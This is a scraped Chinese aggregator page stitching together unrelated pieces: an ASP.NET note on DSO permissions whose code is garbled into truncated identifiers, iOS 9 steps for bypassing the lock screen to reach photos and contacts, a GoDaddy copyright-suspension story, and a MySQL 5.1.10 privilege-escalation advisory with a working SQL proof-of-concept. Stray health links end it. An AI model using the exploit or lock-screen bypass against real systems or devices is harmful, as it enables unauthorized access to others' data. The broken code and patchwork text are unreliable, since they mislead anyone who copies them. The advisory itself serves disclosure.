大庆信息港

当前位置:

绕过qq空间访问权限ASPNET通过DS

2019/05/15 来源:大庆信息港

导读

1 : 通过DSO访问分析服务器的权限问题中通过DecisionSupportObjects(DSO)访问分析服务器的权限问题1.引

1 : 通过DSO访问分析服务器的权限问题

中通过DecisionSupportObjects(DSO)访问分析服务器的权限问题

1.引子

先看1段代码:

publicclassWebForm1:ge

{

privatevoidButton1_Click(objectsender,entArgse)

{

rverdsoServer=rverClass();

nnect("lisp-pc");

oseServer();

}

}

这是用中调用DSO的1个代码片断,程序的本意是想连接到lisp-pc上的分析服务器(这段代码所在的Web服务器也在lisp-pc上)。但不幸得的是实行完nnect("lisp-pc");以后,程序抛出了1个异常。事实上,一样的代码在WidnowsApplication的项目中,运行正常。

2.到底产生了甚么事情

事实上,这段代码潜伏着3个问题。

2.1线程模式不1致

DSO线程模式跟的客户端环境线程模式不1致。前者是STA模式,而后者是MTA模式。解决的办法是在这段代码所在的ASPX文件的中加入aspcompat="true",使得,这个页面的线程模式跟STA匹配。

2.2OLAPAdministrators

DSO的调用者需要加入OLAP服务器的OLAPAdministrators组才有权限连接到OLAP服务器。中,在默许的情况下,这段代码调用者的身份是ASPNET和IUSER_MACHINE(这两个角色在什么时候起作用有待考核)。解决的办法有在OLAP服务器上,把这个账户加入到OLAPAdministrators组中。更进1步的方法是,在IIS服务器中配置利用程序的身份,或通过nfig的identity属性配置,一样将定制好的用户加入OLAP服务器的OLAPAdministrators组中。

2.3分析服务器的BIN目录

1个很让人忽视的地方就是,DSO的调用者需要对分析服务器的BIN目录的出来又读取的权限,还需要有修改和写入的安全权限。对分析服务器的BIN的存取是以Windows文件同享的方式进行处理的。可以料想,对DSO调用是,DSO可能需要对该目录下的b和b两个文件进行存取,所以,才需要对BIN目录有读取和写入的权限。

3.总结

以上的解决方法,1部份整理自组(通过Google查找的),1部份是自己探索和验证的结果,有毛病的地方,请告知,谢谢!

2 : iOS 9被曝大Bug 绕过锁屏可访问Siri中的相册和联系人

数据显示,iOS 9在发布后24小时的安装率到达了17.32%,目前已超过了30%,1举成为苹果史上更新速度快的操作系统。不过,已有用户迅速发现了1个系统漏洞,可以轻松绕过锁屏密码访问联系人、照片等。

漏洞的肇源就是锁屏下可访问Siri,具体操作以下:

1.先输错4次密码,在第5次的时候,先键入前3或5个数字,在输入1位的时候同时按Home键。

2.此时Siri出现,问时间,点击时钟然后添加新时钟,地址栏随意输。

3.双击地址栏文字,点击分享,再点击信息。

4.这时候就进入了信息界面,你可以在收件人里自行,双击后就能够添加联系人。

5.重点来了,在创建头像的时候,相册便完全展现在眼前了。

图片演示:

视频演示:

解决办法:

由此可以看出,即便设置了锁屏密码,也不能存储资料的安全。解决方法也很简单,设置TouchID和指纹,禁用锁屏下可访问便可。

相干推荐:

升级iOS9后软件打不开怎样办?

升级IOS9新系统后 1定会遇到的6个BUG和解决办法

iOS 9正式版下载地址(iPhone/iPad/iTouch) 附升级教程!

3 : Godaddy英文空间因版权问题被封解决经过

早上起床收到发现站被封,去邮箱发现通知邮件.

当时简单的回了1封。

晚上收到Godaddy版权处回复:

Dear ******,

Thank you for your response to the Copyright Department. In order to reactivate the site in question we will need you to provide the following information in a single email response:

A. An electronic signature. (This can be a scanned copy of your physical signature, or as simple as typing your full name.)

B. Identification of the material in question.

C. A statement, under penalty of perjury, that the material has either been removed or will promptly be removed.

Once we receive this information we will be more than willing to reactivate your website.

Regards,

Copyright Department

根据他的信我又重写了1封:

Dear Sir,

1. Mr *****

2. Through the contacts mailbox within our site, I have handled a few similar problems, Usually after receiving this type complaints. At the first time Ill delete problem articles , I regret that I have never received any information related to this. If there is a breach of Copyright , we will permanently remove these articles immediately.

3. I hereby state under penalty of perjury that ill remove the material. and ill Contact these articless authors immediately to solve the problem.

I hope that can open accounts, I will promptly remove copyrighted content,I look forward to hearing from you shortly.

过了210分钟回信通知解封了

经验教训: 做E文站(尤期是用的国外空间)1定要重视版权问题.有版权问题的尽可能放在国内空间.

站内1定要留下比较可靠的联系办法,再就是出了问题要积极勾通, 表明解决问题的态度和办法..

老外办事效力还是挺高的.空间被封,经过两轮交涉,解封了. 心情愉快,所下写下来分享下

点评:感谢你来ADMIN5投稿,来分享心情,很欣赏你的英文水平。

4 : MySQL权限提升及安全限制绕过漏洞

受影响系统:

MySQL AB MySQL = 5.1.10

描写:

BUGTRAQ ID: 19559

MySQL是1款使用非常广泛的开放源代码关系数据库系统,具有各种平台的运行版本。

在MySQL上,具有访问权限但无创建权限的用户可以创建与所访问数据库名称字母大小写区分的新数据库。成功利用这个漏洞要求运行MySQL的文件系统支持辨别大小写的文件名。

另外,由于在毛病的安全环境中计算了suid例程的参数,攻击者可以通过存储的例程以例程定义者的权限履行任意DML语句。成功攻击要求用户对所存储例程具有EXECUTE权限。

测试方法:

【警 告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!】

1、创建数据库

以下为援用的内容: $ mysql -h rver -u sample -p -A sample

Enter password:

Welcome to the MySQL monitor. Commands end with ; or g.

Your MySQL connection id is 263935 to server version: 4.1.16-standard

mysql create database another;

ERROR 1044: Access denied for user 'sample'@'%' to database 'another'

mysql create database sAmple;

Query OK, 1 row affected (0.00 sec)

2、权限提升

以下为援用的内容: --disable_warnings

drop database if exists mysqltest1;

drop database if exists mysqltest2;

drop function if exists f_suid;

--enable_warnings

# Prepare playground

create database mysqltest1;

create database mysqltest2;

create user malory@localhost;

grant all privileges on mysqltest1.* to malory@localhost;

# Create harmless (but SUID!) function

create function f_suid(i int) returns int return 0;

grant execute on function test.f_suid to malory@localhost;

use mysqltest2;

# Create table in which malory@localhost will be interested but to which

# he won't have any access

create table t1 (i int);

connect (malcon, localhost, malory,,mysqltest1);

# Correct malory@localhost don't have access to mysqltest2.t1

--error ER_TABLEACCESS_DENIED_ERROR

select * from mysqltest2.t1;

# Create function which will allow to exploit security hole

delimiter |;

create function f_evil ()

returns int

sql security invoker

begin

set @a:= current_user();

set @b:= (select count(*) from mysqltest2.t1);

return 0;

end

delimiter ;

# Again correct

--error ER_TABLEACCESS_DENIED_ERROR

select f_evil();

select @a, @b;

# Oops!!! it seems that f_evil() is executed in the context of

# f_suid() definer, so malory@locahost gets all info that he wants

select test.f_suid(f_evil());

select @a, @b;

connection default;

drop user malory@localhost;

drop database mysqltest1;

drop database mysqltest2;

建议:

厂商补丁:MySQL AB

目前厂商已发布了升级补丁以修复这个安全问题,请到厂商的主页下载

经期前小腹胀痛
为什么会经前小腹胀痛
月经不调吃啥能调理
标签